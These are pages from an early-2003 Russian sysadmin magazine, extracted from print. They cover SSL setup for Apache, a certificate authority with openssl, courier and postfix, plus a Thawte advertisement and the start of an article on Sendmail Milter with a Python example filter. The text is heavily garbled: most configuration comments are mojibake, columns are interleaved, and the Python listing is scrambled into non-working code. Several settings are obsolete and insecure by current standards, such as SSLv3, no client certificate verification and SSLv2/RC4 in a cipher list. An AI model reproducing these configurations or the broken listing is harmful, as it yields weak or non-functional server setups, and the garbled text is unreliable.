#SSLOptions +FakeBasicAuth +ExportCertData +CompatEnvVars
#+StrictRequire
34
# Ïåðåìåííûå, óñòàíàâëèâàåìûå äëÿ íåêîòîðûõ áðàóçåðîâ.
# Âîîáùå-òî âñå áðàóçåðû äîëæíû ïîëó÷èòü ïåðåä çàâåðøåíèåì
# ssl-ñåàíñà ñîîáùåíèå îò ñåðâåðà, ÷òî ñîîòâåòñòâóåò
# ñòàíäàðòó, íî íåêîòîðûå (îñîáåííî çäåñü êðàñóåòñÿ îñëèê)
# î÷åíü íåêîððåêòíî (ìÿãêî ãîâîðÿ) çàâåðøàþò ðàáîòó ñ ssl,
# ïîýòîìó ïðèõîäèòñÿ óñòàíàâëèâàòü ïåðåìåííóþ
# ssl-unclean-shutdown, êîòîðàÿ ãîâîðèò î òîì, ÷òî ïðè
# çàâåðøåíèè ñîåäèíåíèÿ ñåðâåð íå äîëæåí íè ïîñûëàòü
# ñîîáùåíèå, íè ïðèíèìàòü ïîäòâåðæäåíèå îò áðàóçåðà
# (÷òî òîæå ìîæåò äåëàòüñÿ íåêîòîðûìè áðàóçåðàìè). Êðîìå
# ýòîãî, îñëèê åù¸ â ñëó÷àå ssl-ñîåäèíåíèÿ ïëîõî ðàáîòàåò
# ñ keepalive-ñîîáùåíèÿìè (âûçûâàÿ ðàçðûâ ssl-ñîåäèíåíèÿ),
# ïîýòîìó ïðèõîäèòñÿ óñòàíàâëèâàòü åù¸ ïåðåìåííóþ
# nokeepalive. Ó îñëà òàêæå åñòü åù¸ ïàðà íåäîñòàòêîâ:
# îí íå ðàáîòàåò ñ àäðåñîì âðîäå https://192.168.1.1
# è íåêîòîðûå åãî âåðñèè íå ïîääåðæèâàþò ðàáîòó ñ sslv3.
# À âîîáùå ïðè âûáîðå àëãîðèòìîâ øèôðîâàíèÿ –
# SSLCipherSuite – ïðîñìîòðèòå ñïèñîê àëãîðèòìîâ,
# ïîääåðæèâàåìûõ êëèåíòñêèì áðàóçåðîì è, èñõîäÿ èç ýòîãî,
# âûáèðàéòå íóæíîå (+) è îòñåêàéòå íåíóæíîå (-).
SetEnvIf User-Agent ".*MSIE.*" nokeepalive ssl-unclean-
shutdown
# Óñòàíàâëèâàåì ñïåöèàëüíûé ëîã, âêëþ÷àåì îïðåäåëåíèå
# ïðîòîêîëà è àëãîðèòìà øèôðîâàíèÿ.
CustomLog logs/ssl_request_log \
"%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b"
# Ïåðåçàïóñêàåì àïà÷, åñëè ssl îêàçàëñÿ íåâêëþ÷åííûì.
RewriteEngine on
RewriteCond %{HTTPS} !=on
RewriteOptions inherit
</VirtualHost>
</IfModule>
Для проверки работы сервера ssl обычно применяет-
ся утилита openssl s_client, которая эмулирует поведение
ssl клиента (фактически, ssl telnet):
openssl s_client -connect ww.test.ru:443 [-cert file] [-
debug] [-ciphers list]
Клиент может передать серверу сертификат (аутнен-
тификация по сертификату), указав опцию -cert, опция
-debug включает в вывод дополнительную отладочную
информацию, включая hex-дампы каждого пакета. Для
проверки апача можно также применить свой любимый
браузер (мой любимый – lynx):
lynx https://www.test.ru
При этом в лог записывается примерно следующее
(если сервер настроен правильно):
[10/Nov/2002 17:41:34 04803] [info] Connection to child
0 established (server localhost.localdomain:443, client
127.0.0.1)
[10/Nov/2002 17:41:34 04803] [info] Seeding PRNG with
23177 bytes of entropy
[10/Nov/2002 17:41:35 04803] [info] Connection: Client
IP: 127.0.0.1, Protocol: TLSv1, Cipher: EDH-RSA-DES-CBC3-SHA
(168/168 bits)
[10/Nov/2002 17:41:35 04803] [info] Initial (No.1) HTTPS
request received for child 0 (server
localhost.localdomain:443)
[10/Nov/2002 17:41:35 04803] [info] Connection to child
0 closed with standard shutdown (server
localhost.localdomain:443, client 127.0.0.1)
Итак, могу привести парочку примеров применения ssl-
соединений:

это любые процедуры конфиденциальной регистрации;


возможность организации защищённого веб-интер- может сильно увеличить сложность работы, если вам не-
фейса для почты;

работа с клиентами данной фирмы; Теперь настало время обратиться к защите почтовых

для защиты некоторых мест от посторонних взглядов серверов. Одним из наиболее удобных вариантов являет-
(это несоизмеримо безопаснее, чем парольная аутен-
тификация!) и подмены IP-адреса;

для организации собственного CA.
Вообще агентства по выдаче персональных серти-
фикатов работают по следующей схеме: пользователь
заходит на сайт и просит сертификат, после чего уста-
навливается безопасное соединение, и клиент запол-
няет форму регистрации (включая пароль секретного
ключа), после этого создаётся запрос на сертификацию
(на сервере), и на основе сертификата организации со-
здаётся сертификат клиента. После этого обычно сер-
тификат клиента перегоняется в pkcs#12 формат и за-
писывается на диск. Пользователю же по мылу отправ-
ляется ссылка на полученный сертификат. Этот несча-
стный клиент проходит по ссылке, вводит своё имя и
пароль (в безопасном режиме – https) и перенаправля-
ется к своему сертификату. Браузер, получив сертифи-
кат, проверяет его подпись и после запроса помещает
в хранилище личных сертификатов. Я здесь не буду
приводить готового решения, т.к. это дело очень твор-
ческое и создать вышеописанное не представляет тру-
да, только надо немного поработать (написать скрип-
тик, оформить всё это безобразие, организовать мыль-
ную связь и.т. д.).
А теперь расскажу об одном непременном атрибуте
каждого СА: создания списка недействительных сертифи-
катов (чтобы не переполнять текст, буду далее применять
обозначение CRL). По истечении определённого срока
сертификат становится недействительным. Если это сер-
тфикат сотрудника, то после его увольнения сертификат
также необходимо считать недействительным (а если уво-
лили вас?). Если секретный ключ сертификата стал дос-
тоянием общественности, то и его вносят в CRL. Для уп-
равления CRL можно использовать утилиту openssl ca. Для
начала создаём crl:
openssl ca -gencrl -out crl.pem
Затем просто отменяем нужные ( точнее говоря, не-
нужные) сертификаты командой:
openssl ca -revoke bad_cert.pem
После каждого применения revoke необходимо обнов-
лять CRL командой openssl -gencrl. Для применения внут-
ри СА необходимо дать клиентам возможность отменять
их сертификаты, для этого необходимо предоставить им
доступ к CRL. Если же вы используете аутентификацию
через сертификаты, то пользователям необходимо понять,
как опасно потерять секретный ключ.
Ещё способ давать пароль для секретного ключа с по-
мощью /dev/random, закодированного base64, и сообщать
пароль клиенту только лично (можно также поиграться со
временем действия сертификата клиента, но зачастую это
№2(3), февраль 2003
администрирование
обходимо раздавать сертификаты лично).
ся использование courier в качестве pop3- и imap-серве-
ров, а в качестве MTA использовать postfix. Итак, начнём
с курьера.
Курьер поставляется с грамотным конфигом, поэтому
у меня всё заработало сразу же безо всяких проблем с
настройкой. Единственное, что необходимо учесть, так это
то, что сертфикат почтового сервера должен быть подпи-
сан CA-сертификатом (по умолчанию при сборке курьера
генерится self-signed сертификат, но я бы рекомендовал
создать сертификат, как это было сделано в апаче или
воспользовавшись моим скриптиком CA, только необхо-
димо изменить настройки extensions). Кроме этого, сер-
тификат организации, которым был подписан ключ сер-
вера, должен находиться среди доверенных сертифика-
тов почтового клиента. Я всё же расскажу о некоторых
полезных опциях конфигурации couriera (imapd и pop3d):
imapd-ssl
# Çàïóñêàåì ðàáîòó ìåõàíèçìà ssl äëÿ imap-ñåðâåðà. Â ôàéëàõ
# esmtpd-ssl, pop3d-ssl ìîæíî òàêæå óñòàíàâëèâàòü ýòó îïöèþ
# äëÿ êîíêðåòíîãî ñåðâåðà (íàïðèìåð, ESMTPDSSLSTART...).
IMAPDSSLSTART=YES
# Ïîðò äëÿ áåçîïàñíîãî ñîåäèíåíèÿ (ïî óìîë÷àíèþ ïîðò íå
# îïðåäåë¸í, íî îáû÷íî èñïîëüçóþòñÿ ñëåäóþùèå çíà÷åíèÿ:
# IMAPS - 993, POPS - 995 è SMTPS - 465). Àäðåñ çàäàåòñÿ
# êàê IP-àäðåñ.
SSLPORT=993
SSLADDRESS=0
# PID-ôàéë äëÿ ssl ñåðâåðà.
SSLPIDFILE=/var/run/courier/imapd[pop3d, esmtpd]-ssl.pid
# Èñïîëüçîâàíèå óëó÷øåííîãî ïðîòîêîëà tls, ïî óìîë÷àíèþ
# âûêëþ÷åíî, íî ó ìåíÿ âñ¸ ðàáîòàëî íîðìàëüíî ñ âêëþ÷åíèåì
# ðàñøèðåíèé tls. TLS èñïîëüçóåòñÿ, åñëè íåîáõîäèìî
# èñïîëüçîâàòü îñîáûé ssl ïîðò, ò.å. ïîçâîëÿåò èñïîëüçîâàòü
# îñîáûé ïîðò äëÿ ðàáîòû ssl.
IMAPDSTARTTLS=YES
# Çàñòàâëÿåò ðàáîòàòü ìåõàíèçì tls â ëþáûõ ñëó÷àÿõ
# (ïî óìîë÷àíèþ).
IMAP_TLS_REQUIRED=0
Далее идут дополнительные настройки работы ssl.
Обычно они используются при включенной опции
STARTTLS.
# Âñïîìîãàòåëüíàÿ ïðîãðàììà, èñïîëüçóþùàÿñÿ ïðè ðàáîòå
# ñ ssl. Íà ýòàïå êîìïèëÿöèè îíà ñîçäà¸ò ïðîñòîé ñåðòèôèêàò
# (êîòîðûé, âïðî÷åì, ó ìåíÿ íå ðàáîòàë, ïîýòîìó ÿ ñðàçó æå
# ñîçäàë íóæíûé ìíå ïðàâèëüíûé ñåðòèôèêàò), à çàòåì, ïî
# èäåå, äîëæíà èñïîëüçîâàòüñÿ äëÿ àóòåíòèôèêàöèè êëèåíòîâ,
# íî, êàê ÿ ïîíÿë, ðàáîòàòü ïîäîáíûì îáðàçîì ýòî åù¸ íå
# ðàáîòàåò (íå çàáûâàéòå, ÷òî êóðüåð - ýòî äîâîëüíî ìîëîäîé
# ïðîäóêò), íî âñ¸ æå óêàæåì ýòó îïöèþ íà âñÿêèé ñëó÷àé...
COURIERTLS=/usr/bin/couriertls
# Îïðåäåëåíèå âåðñèè èñïîëüçóåìîãî ïðîòîêîëà ssl:
# SSL2 - SSLv2
# SSL3 - SSLv3
# TLS1 - TLS1
TLS_PROTOCOL=SSL3
# Äàííàÿ îïöèÿ ðàññìàòðèâàåòñÿ êàê ìåõàíèçì ðàáîòû ssl,
# åñëè îïðåäåë¸í ïàðàìåòð STARTTLS=YES.
TLS_STARTTLS_PROTOCOL=TLS1
# Ñïèñîê àëãîðèòìîâ øèôðàöèè. Ìîæíî íå òðîãàòü äàííûé
# ïàðàìåòð è îñòàâèòü åãî ïî óìîë÷àíèþ – è òàê ñðàáîòàåò
35
 администрирование
# TLS_CIPHER_LIST="ALL:!ADH:RC4+RSA:+SSLv2:@STRENGTH"
# Ñåðòèôèêàò ñåðâåðà (pem-ôîðìàò). Âíóòðè äàííîãî ôàéëà
# äîëæíû ñîäåðæàòüñÿ ñåðòèôèêàò è ÍÅÇÀØÈÔÐÎÂÀÍÍÛÉ ñåêðåòíûé
# êëþ÷, ïîýòîìó äîñòóï ê äàííîìó ôàéëó íà ÷òåíèå äîëæåí áûòü
# ïðåäîñòàâëåí òîëüêî ïîëüçîâàòåëþ courier.
TLS_CERTFILE=/etc/openssl/imapd.pem
# Ñëåäóþùèé ïàðàìåòð îïðåäåëÿåò ïóòü ê êàòàëîãó (èëè ôàéëó),
# ñîäåðæàùåìó "äîâåðåííûå" ñåðòèôèêàòû (åñëè ÿ ïðàâèëüíî
# ïîíÿë, òî ýòî ÑÀ-ñåòðèôèêàòû, íî çäåñü ÿ ìîãó îøèáàòüñÿ).
# Ñåðâåð èñïîëüçóåò äàííûå ñåðòèôèêàòû, åñëè îïöèÿ
# TLS_VERIFYPEER óñòàíîâëåíà â PEER èëè REQUIREPEER. ×åñòíî
# ãîâîðÿ, ñ ýòèì ÿ ðàçîáðàëñÿ íå äî êîíöà, äà è ñàìè ðàç-
# ðàáîò÷èêè êóðüåðà íå î÷åíü-òî ñîâåòóþò èñïîëüçîâàòü äàí-
# íóþ îïöèþ ïî ïðè÷èíå TLS_TRUSTCERTS=/etc/openssl/ca.pem.
# À âîò ýòî òà ñàìàÿ îïöèÿ àóòåíòèôèêàöèè ÷åðåç ñåðòèôèêàòû,
# îíà ìîæåò ïðèíèìàòü ñëåäóþùèå çíà÷åíèÿ:
# NONE - íå ïðîâåðÿåì ñåðòèôèêàò êëèåíòà âîâñå.
# PEER - ïðîâåðÿåì ñåðòèôèêàò êëèåíòà, åñëè ïîñëåäíèé
# ïåðåäàë åãî ñåðâåðó.
# REQUIREPEER - ïðîâåðÿåì ñåðòèôèêàò êëèåíòà è çàïðåùàåì
# âõîä, åñëè êëèåíò íå ïðåäîñòàâèë ñåðòèôèêàòà
# (èëè ñåðòèôèêàò íåâåðíûé).
TLS_VERIFYPEER=NONE
Думаю, что дальнейшая настройка курьера не должна
вызвать проблем (courier – один из самых простых в на-
стройке почтовых служб, т.к. все переменные внутри его
конфигов фактически имеют тот же синтаксис, что и пе-
ременные в shell).
Другой популярный мыльный сервер – postfix – также
легко поддаётся бронированию с помощью ssl. Сразу же
приведу пример настройки smtpd postfixa, который исполь-
зует при передаче почты механизм ssl:
main.cf:
# Ñîçäà¸ì ñòàíäàðòíûé ñåðâåðíûé ñåðòèôèêàò (êàê áûëî óæå
# íåñêîëüêî ðàç îïèñàíî) è íåçàøèôðîâàííûé ñåêðåòíûé êëþ÷.
# Óêàçûâàåì äàëåå ê íèì ïóòü.
smtpd_tls_cert_file = /etc/openssl/smtpd.pem
smtpd_tls_key_file = /etc/openssl/smtpd.key
# Óêàçûâàåì òàêæå ïóòü ê trusted root CA ôàéëó (pem-ôîðìàò)
# Ìîæíî òàêæå óêàçàòü ïóòü ê êàòàëîãó ñ CA-ñåðòèôèêàòàìè,
# íî òóò âîçíèêàþò ïðîáëåìû ñ õåø-ôàéëàìè (ÿ èõ óæå
# îïèñûâàë ïðè ðàçãîâîðå îá àïà÷å).
smtpd_tls_CAfile = /etc/openssl/ca.pem
# Óðîâåíü çàïèñè â ëîã. Ìåíÿåòñÿ îò 0 äî 4:
# 0 – çàáèâàåì íà ëîãè;
# 1 – âûâîäèì èíôîðìàöèþ î ñåðòèôèêàòàõ ïðè óñòàíîâêå
# ñîåäèíåíèÿ;
# 2,3,4 – ðàçëè÷íàÿ äîïîëíèòåëüíàÿ èíôà (âðîäå hex-äàìïîâ
# ïàêåòîâ è.ò.ä.).
# Ðåêîìåíäóåòñÿ èñïîëüçîâàòü çíà÷åíèå 1 èëè 2.
smtpd_tls_loglevel = 1
# Ïî óìîë÷àíèþ ìåõàíèçì ssl íå âêëþ÷¸í – âêëþ÷àåì åãî.
smtpd_use_tls = yes
# Óñòàíîâêîé ñëåäóþùåé îïöèè â yes (ïî óìîë÷àíèþ - no)
# ìîæíî äîáèòüñÿ òîãî, ÷òî âñå êîìàíäû smtp-ñåðâåðà áóäóò
# âûïîëíÿòüñÿ â ssl-ðåæèìå (ýòî íå ïîäõîäèò äëÿ ñåðâåðîâ,
# êîòîðûå ïðåäîñòàâëÿþò îáå óñëóãè: çàùèù¸ííîå ìûëî
# è ñòàíäàðòíîå).
# smtpd_enforce_tls = no
# Çàïðîñ íà ñåðòèôèêàò êëèåíòà. ß çäåñü íå áóäó
# îñòàíàâëèâàòüñÿ, ò.ê. âðÿä ëè êòî áóäåò ïðèìåíÿòü ýòîò
# óæàñ (òåì áîëåå, ÿ íå âèäåë íè îäíîãî êëèåíòà, ñïîñîáíîãî
# âûïîëíèòü àóòåíòèôèêàöèþ ïî ñåðòèôèêàòó). Ïîýòîìó ëó÷øå
# îñòàâèòü ýòó îïöèþ ïî óìîë÷àíèþ â no (ýòî òàêæå êàñàåòñÿ
# è îïöèè smtpd_tls_req_ccert).
# smtpd_tls_ask_ccert = no
# Äëÿ ñîâìåñòèìîñòè ñî ñòàðûìè âåðñèÿìè postfix ïðèíèìàåòñÿ
36
# êîìàíäà AUTH áåç øèôðîâàíèÿ, ÷òî ñîçäà¸ò óãðîçó
# áåçîïàñíîñòè, óñòàíîâêà ñëåäóþùåé îïöèè â yes ãîâîðèò,
# ÷òî øèôðîâàíèå áóäåò ïðîèçâîäèòüñÿ òîëüêî äëÿ êîìàíäû
# AUTH. Äëÿ ïîëíîãî øèôðîâàíèÿ âñåãî òðàôèêà èñïîëüçóéòå
# îïöèþ smtpd_enforce_tls.
# smtpd_tls_auth_only = no
# Ôàéë êåøà ssl äëÿ ñåðâåðà. Ïîääåðæèâàåòñÿ òîëüêî ôîðìàò
# sdbm, ò.ê. íåîáõîäèìà ïîääåðæêà îäíîâðåìåííîé çàïèñè
# íåñêîëüêèõ ïðîöåññîâ â äàííûé ôàéë.
smtpd_tls_session_cache_database = sdbm:/etc/postfix/
smtpd_scache
# Òàéì-àóò äëÿ êåøà.
smtpd_tls_session_cache_timeout = 3600s
# Òðàäèöèîííûé ñïèñîê èñïîëüçóåìûõ àëãîðèòìîâ.
# smtpd_tls_cipherlist = DEFAULT
# Òàéì-àóò äëèòåëüíîñòè ñîåäèíåíèÿ ss.
smtpd_starttls_timeout = 270s
# Óñòàíîâêè ãåíåðàòîðà ñëó÷àéíûõ ÷èñåë. Èñïîëüçóþòñÿ
# ñòàíäàðòíûå óñòðîéñòâà ðàíäîìèçàöèè èëè egd-ãåíåðàòîð.
# Óñòàíàâëèâàòüñÿ ìîæåò òàêæå ÷èñëî ñ÷èòûâàåìûõ áàéò è
# âðåìÿ îáíîâëåíèÿ óñòàíîâêè ãåíåðàòîðà ñëó÷àéíûõ ÷èñåë.
tls_random_source = dev:/dev/urandom
Также необходимо создать запись в master.cf, чтобы
указать postfix слушать smtps-порт (кроме этого, застав-
ляем на порту smtps использовать полную шифрацию пе-
редаваемого трафика):
# tls_random_source = egd:/var/run/egd-pool
# tls_random_bytes = 32
# tls_random_reseed_period = 3600s
Вместо имени сервиса можно указать номер порта
(обычно 465).
Sendmail также обладает возможностью использова-
ния ssl, но я не являюсь специалистом по sendmail (на-
верное, виной тому паталогическая лень и наличие более
простых в освоении инструментов).
SSL, похоже, будет всё больше и больше использовать-
ся в сети, защищая стандартные протоколы. Поэтому каж-
дый администратор должен знать принципы работы с ssl.
И если я помог кому-то в освоении данной темы, то могу
считать свою задачу выполненной!
Приведу некоторые ссылки:
http://www.openssl.org – основной сайт с документаци-
ей и исходниками openssl;
http://www.apache-ssl.org – домашняя страница mod_ssl
апача;
http//www.postfix.org – страница производителей postfix;
http://www.lothar.com/tech/crypto/ – страница генерато-
ра случайностей EGD;
http://www.thawte.com – одна из коммерческих фирм,
торгующих сертификатами, предоставляет бесплатные
сертификаты для мыла и платные для всего остального.
И ещё информация для тех, кто решил работать с ssl:
не так давно в механизме openssl были обнаружены уяз-
вимости, поэтому не поленитесь сходить на
www.openssl.org за последними патчами.
БЕЗОПАСНОСТЬ
ИНТЕРНЕТ-КОММЕРЦИИ
Традиционные протоколы Интернета (например, HTTP – ос-
новной протокол для передачи страниц WWW) не обеспе-
чивают практически никакой защиты информации на пути
от сервера к клиенту и обратно. Злоумышленники доволь-
но легко могут перехватывать информационные пакеты,
искажать содержащиеся в них данные и даже перенаправ-
лять весь информационный обмен с клиентом на поддель-
ный сервер, имитирующий работу сервера вашей компа-
нии. В результате частная информация клиента (например,
данные его кредитной карты) может стать достоянием по-
стороннего, а сделки, совершенные с участием подстав-
ного сервера – предметом споров. Учитывая это, многие
пользователи, совершающие сделки через Интернет, про-
сто отказываются от работы с сайтом, не обеспечивающим
необходимого уровня защиты он-лайновых транзакций.
С другой стороны, пользователь сайта, поддержи-
вающего безопасный протокол SSL и имеющего циф-
ровой сертификат от Thawte, может быть уверен:

в подлинности (аутентичности) сайта: просматривае-
мая пользователем страница получена именно с ука-
занного адреса, а сам сайт действительно принадле-
жит компании, на имя которой выдан сертификат;

в целостности информации: за время передачи дан-
ных через Интернет они не могут быть изменены или
испорчены;

в приватности информации: за счет использования шиф-
рования данных, передаваемых между клиентом и сер-
вером, их содержание не станет доступно посторонним.
№2(3), февраль 2003
При этом процесс аутентификации полностью «про-
зрачен» для пользователя, т.е. не требует от него спе-
циальных знаний или каких-либо действий, отличаю-
щихся от обычной работы с интернет-браузером. Про-
токол SSL в настоящее время поддерживается большин-
ством браузеров, включая Microsoft Internet Explorer,
Netscape Navigator, Opera и Mozilla. О работе через бе-
зопасное соединение с использованием цифрового сер-
тификата в этих программах говорит специальный ин-
дикатор в строке статуса.
В сертификатах использована удобная в обращении
и высоконадежная технология криптозащиты с двойным
ключом длиной до 128 бит, причем использование Су-
персертификатов позволяет применять ее даже в ста-
рых и международных версиях браузеров, имеющих ог-
раничения по длине ключа. Многие российские компа-
нии, предоставляющие различные сервисы через Ин-
тернет, а также большое количество банков и иных фи-
нансовых структур уже давно пользуются цифровыми
сертификатами Thawte для обеспечения безопасности
информационного обмена со своими клиентами. В Рос-
сии пионером по предоставлению цифровых сертифи-
катов стала три года назад компания «РБК-Софт», вхо-
дящая в группу компаний «РосБизнесКонсалтинг» –
единственный представитель компании Thawte на тер-
ритории Российской федерации, СНГ и стран Балтии.
37
администрирование

ПОЧТОВЫЙ
ФИЛЬТР
ИЛИ
MILTER =
MAIL + FILTER В версии Sendmail 8.11.6 появилось нововведение, которое приоткрывает
дверцу над таинственными процессами по обработке почтовых сообщений. И
эта дверца – программный интерфейс фильтров по содержанию (content filter
API, или, коротко, Milter) – очень существенный элемент для организации
обработки почты в масштабах всего почтового сервера.

РОМАН СУЗИ

Если для индивидуальной настройки доставки почты в
UNIX-системах обычно применяется procmail, то для об-
работки всей проходящей через сервер почты Milter под-
ходит как нельзя кстати. Для большей эффективности ре-
комендуется применять версию Sendmail 8.12.
Главными применениями Milter можно считать:

отклонение писем со спамом;

организация проверки на вирусы;

обезвреживание опасных вложений;

фильтрация по содержимому;

организация нестандартной обработки и сортировки
почты.
Еще раз отметим, что Milter дает доступ не только ко
входящим письмам, но и к исходящим. Это позволяет пре-
дотвращать злоупотребления почтовым сервером со сто-
роны местных пользователей.
Одной из очень полезных особенностей Milter являет-
ся его большая эффективность по сравнению с другими
средствами обработки почты. Во-первых, Milter дает при-
ложению-фильтру доступ к информации о сообщении на
очень ранних стадиях его получения Sendmail: с помощью
Milter приложение-фильтр получает атрибуты SMTP-ко-
манд вместе с Sendmail, что позволяет отклонять сооб-
щения, еще не получив их в полном объеме. Во-вторых,
Milter поддерживает многопоточность, что позволяет
иметь всего один экземпляр приложения-фильтра, а не
запускать приложение для каждого сообщения (как это
делает procmail). В-третьих, подключение Milter-приложе-
ния к Sendmail можно сделать достаточно безопасным,
определив требуемую реакцию Sendmail на тот случай,
если приложение-фильтр не отвечает. Наконец, приложе-
ние-фильтр может находиться на другой машине, обща-
ясь с почтовым сервером по TCP/IP. Кстати, фильтр мо-
жет быть не один. Крючки (hooks) к Milter API имеются для
многих известных антивирусных и антиспамовых про-
грамм.
Есть, конечно, у Milter и минусы. Во-первых, он рабо-
тает только с Sendmail. Во-вторых, в нем не очень удобно
(хотя и возможно) реализовать фильтрацию на основе ин-
дивидуальных настроек пользователей, как это имеет ме-
сто с procmail.
Sendmail и приложение-фильтр общаются через сокет.
Это может быть сокет в файловой системе, IP-сокет (или
IPv6-сокет). Первый более эффективен, если обработка
почты происходит на локальной машине, а второй позво-
ляет вынести фильтрацию почты на другую машину (или
машины). Например, один хост может быть целиком за-
действован для фильтрации спама, другой – проверять
сообщения на вирусы, а третий – анализировать соответ-
ствие содержимого почтовых сообщений принятой поли-
тике (скажем, образовательное учреждение может филь-
тровать письма сомнительного содержания). На любом
этапе Milter может пропустить (ACCEPT), отклонить
(REJECT) или выбросить (DROP) обрабатываемое сооб-
щение. Milter также может менять список получателей
письма, изменять заголовочную часть и тело. При откло-
нении письма можно указать его детальную причину.
Sendmail написан на C, и поэтому Milter API ориенти-
№2(3), февраль 2003
администрирование
рован на C-приложения. Однако пример, который мы рас-
смотрим ниже, использует Python Milter – обертку Milter
API для языка Python. Эта обертка – полноценный объек-
тный интерфейс к обрабатываемому SMTP-соединению.
Отметим, что использование интерпретатора скриптово-
го языка существенно не влияет на производительность
приложения, так как приложение работает в режиме де-
мона. Зато мы получаем большой выигрыш в выражении
логики приложения-фильтра и доступ к богатым стандар-
тным библиотекам Python.
Чтобы использовать приложения-фильтры, нужно
скомпилировать Sendmail с поддержкой Milter API. Как
это сделать, описано в документации к Sendmail. В част-
ности, необходимо указать в файле devtools/Site/
site.config.m4 опцию:
APPENDDEF(“conf_sendmail_ENVDEF”, “-DMILTER”)
Для нашего примера понадобится Python 2.x и Python
Milter. Первый можно взять на www.python.org, а второй
– на http://www.bmsi.com/python/milter.html. Его необхо-
димо скомпилировать, использовав библиотеки соответ-
ствующей версии Sendmail. Подробнее об этом написа-
но в документации к Python Milter. Возможно, потребует-
ся дополнительно установить заголовочные файлы и
библиотеки libmilter и smutil – конкретнее об этом сказа-
но на указанной выше www-странице. [Мне даже прихо-
дилось переименовывать libsmutil в libsm – прим. авто-
ра]. В результате компиляции Python Milter должен полу-
читься файл milter.so, который вместе с mime.py и
Milter.py нужно поместить в каталог с другими модулями
Python.
Python Milter имеет в своем составе два закончен-
ных примера, однако подходящий именно вам фильтр
лучше составить самому. Приведенный ниже пример
(листинг 1) Milter поможет вам разобраться в Milter API.
Конечно, это не законченный продукт, а скорее конст-
руктор, который нужно доработать, добавив требуемую
вам логику.
В этой небольшой программе описывается класс
ExampleMilter, основанный на классе Milter из модуля
Milter. Для каждого SMTP-соединения создается новый
объект класса ExampleMilter. Отдельные методы этого
объекта отвечают за обработку определенных событий
(см. комментарии в тексте программы). Вся информа-
ция, касающаяся определенного соединения, должна
храниться в атрибутах объекта. В нашем примере так
накапливается и хранится bodysize (размер тела сооб-
щения) и некоторые вспомогательные объекты. (В Python
сам объект передается в метод в качестве первого аргу-
мента и традиционно называется self, поэтому для рабо-
ты с атрибутами внутри метода нужно использовать
self.имя_атрибута. Кстати, в Python новые атрибуты мо-
гут появляться в объекте в любой удобный момент.)
Здесь следует заметить, что методы вызываются в оп-
ределенной последовательности, и нет гарантии, что для
данного соединения будет вызван тот или иной метод.
Например, следом за hello() может сразу последовать
abort(). Это обстоятельство необходимо учитывать при
39
 администрирование
ëèñòèíã ¹1
#!/usr/bin/python2 """Âûçûâàåòñÿ äëÿ êàæäîãî ôðàãìåíòà òåëà ñîîáùåíèÿ
""" """
Ïðèìåð Milter, íà îñíîâå êîòîðîãî ìîæíî # Òåëî ñîîáùåíèÿ ïî êóñî÷êàì ïèøåòñÿ â òîò æå ôàéë
íàïèñàòü ñîáñòâåííûé ôèëüòð äëÿ ïî÷òû. if self.fp:
""" self.fp.write(chunk)
import sys, os, Milter, tempfile, re, traceback self.bodysize += len(chunk)
from time import strftime, time, localtime return Milter.CONTINUE

def dbg_except(): def eom(self):

"""Ôóíêöèÿ, êîòîðóþ ìîæíî ñòàâèòü â ÷àñòè except: """Âûçûâàåòñÿ â êîíöå êàæäîãî ñîîáùåíèÿ
îïåðàòîðà try-except äëÿ îòëàäêè """
""" # Çàêðûâàåì âðåìåííûé ôàéë (åñëè îí åñòü)
sys.stderr.write(strftime(“%Y%m%d%H%M%S “) + if self.fp:
"".join(apply(traceback.format_exception, self.fp.close()
sys.exc_info()))) else:
return Milter.TEMPFAIL
class ExampleMilter(Milter.Milter): # Çäåñü ìîæíî äåëàòü âñåâîçìîæíûå ïðîâåðêè
"""Êëàññ, êàæäûé îáúåêò êîòîðîãî îòâå÷àåò çà # è âûçûâàòü ñëåäóþùèå ìåòîäû:
îäíî ñîåäèíåíèå."""
# Óäàëèòü ïîëó÷àòåëÿ:
def log(self, *msg): # self.delrcpt("<user1@host.ru>")
print "%s [%d] %s" % (strftime(“%Y%m%d%H%M%S”),
self.id, " ".join(map(str, msg))) # Äîáàâèòü ïîëó÷àòåëÿ:
# self.addrcpt("<user2@host.ru>")
def __init__(self):
self.tempname=self.mailfrom=self.connfrom=self.fp=None # Äîáàâèòü ïîëå â çàãîëîâîê:
self.id = Milter.uniqueID() # self.addheader("X-Processed-By", "Milter")
def connect(self, hostname, unused, hostaddr): # ...è äðóãîå (ñì. äîêóìåíòàöèþ ê Milter)
"""Âûçûâàåòñÿ ïðè óñòàíîâêå SMTP-ñîåäèíåíèÿ"""
self.log("connect: %s, %s" % (hostname, hostaddr)) # Çàìåíèòü òåëî ñîîáùåíèÿ (ïîêóñî÷íî):
# Çäåñü ìîæíî ñðàçó ïðîâåðèòü è îòêëîíèòü: # for c in chunks:
# return Milter.REJECT # self.replacebody(c)
return Milter.CONTINUE
# Îòêëîíèòü ñîîáùåíèå (ñ óêàçàíèåì ïðè÷èíû):
def hello(self,hostname): # self.setreply(“550”, “5.1.1”, “SPAM”)
"""Âûçûâàåòñÿ ïîñëå êîìàíäû HELO""" # return Milter.REJECT
self.log("hello from %s" % hostname)
return Milter.CONTINUE # Îòáðîñèòü ñîîáùåíèå:
# return Milter.DROP
def envfrom(self, f, *s):
"""Âûçûâàåòñÿ ïîñëå êîìàíäû MAIL FROM # Ïðèíÿòü ñîîáùåíèå:
(èõ ìîæåò áûòü íåñêîëüêî â ðàìêàõ îäíîãî ñîåäèíåíèÿ). self.log(“msg accepted: size=%s” % self.bodysize)
Îòìå÷àåò íà÷àëî ñîîáùåíèÿ.""" return Milter.ACCEPT
self.log("mail from", f, s)
self.tempname = None def abort(self):
self.mailfrom = f """Âûçûâàåòñÿ â ñëó÷àå íåíîðìàëüíîãî çàâåðøåíèÿ
self.headers = [] ñîåäèíåíèÿ
self.bodysize = 0 """
return Milter.CONTINUE self.log("abort. Size=%d" % self.bodysize)
return Milter.CONTINUE
def envrcpt(self, to, *s):
"""Âûçûâàåòñÿ ïîñëå êîìàíäû RCPT TO def close(self):
(èõ ìîæåò áûòü íåñêîëüêî äëÿ êàæäîãî ñîîáùåíèÿ). """Âûçûâàåòñÿ â êîíöå ñîåäèíåíèÿ, äàæå åñëè
""" îíî áûëî ïðåðâàíî
self.log("rcpt to", to, s) """
return Milter.CONTINUE self.log("connection closed.")
sys.stdout.flush()
def header(self, name, val): if self.fp:
"""Âûçûâàåòñÿ äëÿ êàæäîãî ïîëÿ çàãîëîâêà ñîîáùåíèÿ self.fp.close()
